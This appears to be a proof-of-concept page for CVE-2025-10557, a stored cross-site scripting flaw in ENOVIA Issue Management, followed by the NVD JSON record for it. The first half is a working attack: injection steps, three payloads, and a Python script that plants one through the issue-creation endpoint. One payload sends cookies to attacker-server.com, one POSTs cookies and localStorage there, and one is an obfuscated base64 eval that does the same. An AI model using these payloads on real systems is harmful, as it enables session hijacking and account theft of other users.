CVE-2025-10557

<!-- CVE-2025-10557 PoC for Stored XSS in ENOVIA Collaborative Industry Innovator Issue Management --> <!-- Step 1: Login to 3DEXPERIENCE platform with low-privilege account --> <!-- Step 2: Navigate to ENOVIA Collaborative Industry Innovator > Issue Management --> <!-- Step 3: Create a new Issue and inject the following malicious payload into the description field --> <!-- Payload 1: Basic cookie stealing --> <img src=x onerror="var i=new Image(); i.src='https://attacker-server.com/steal?cookie='+document.cookie;"> <!-- Payload 2: Session hijacking via fetch --> <script> fetch('https://attacker-server.com/collect', { method: 'POST', body: JSON.stringify({ cookies: document.cookie, url: window.location.href, localStorage: JSON.stringify(localStorage) }), headers: {'Content-Type': 'application/json'} }); </script> <!-- Payload 3: SVG-based XSS (may bypass some filters) --> <svg onload="eval(atob('ZmV0Y2goJ2h0dHBzOi8vYXR0YWNrZXItc2VydmVyLmNvbS9jb2xsZWN0P2M9JyArIGRvY3VtZW50LmNvb2tpZSk=')"> <!-- Step 4: Submit the Issue. The malicious script is now stored on the server. --> <!-- Step 5: When any other user (e.g., admin) views this Issue, the script executes in their browser. --> <!-- Python exploit script to automate the attack --> import requests TARGET_URL = "https://target-3dexperience-platform.com" SESSION_COOKIE = "attacker_session_cookie" ATTACKER_WEBHOOK = "https://attacker-server.com/collect" payload = '<img src=x onerror="var i=new Image(); i.src=\'{0}?cookie=\'+document.cookie;">'.format(ATTACKER_WEBHOOK) # Create issue with XSS payload headers = { "Cookie": "JSESSIONID=" + SESSION_COOKIE, "Content-Type": "application/x-www-form-urlencoded" } data = { "title": "Normal Issue Title", "description": payload, "action": "create" } response = requests.post( TARGET_URL + "/enovia/issue/create", headers=headers, data=data ) if response.status_code == 200: print("[+] XSS payload stored successfully in Issue Management") print("[+] Waiting for victim to view the issue...")

{"cve": {"id": "CVE-2025-10557", "sourceIdentifier": "[email protected]", "published": "2025-10-13T08:15:39.250", "lastModified": "2025-10-21T19:51:23.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-site Scripting (XSS) vulnerability affecting Issue Management in ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:3ds:3dexperience_enovia:*:*:*:*:*:*:*:*", "versionStartIncluding": "r2023x", "versionEndIncluding": "r2025x", "matchCriteriaId": "A38313EB-6DE1-4460-84B4-559F14BBCC11"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10557", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}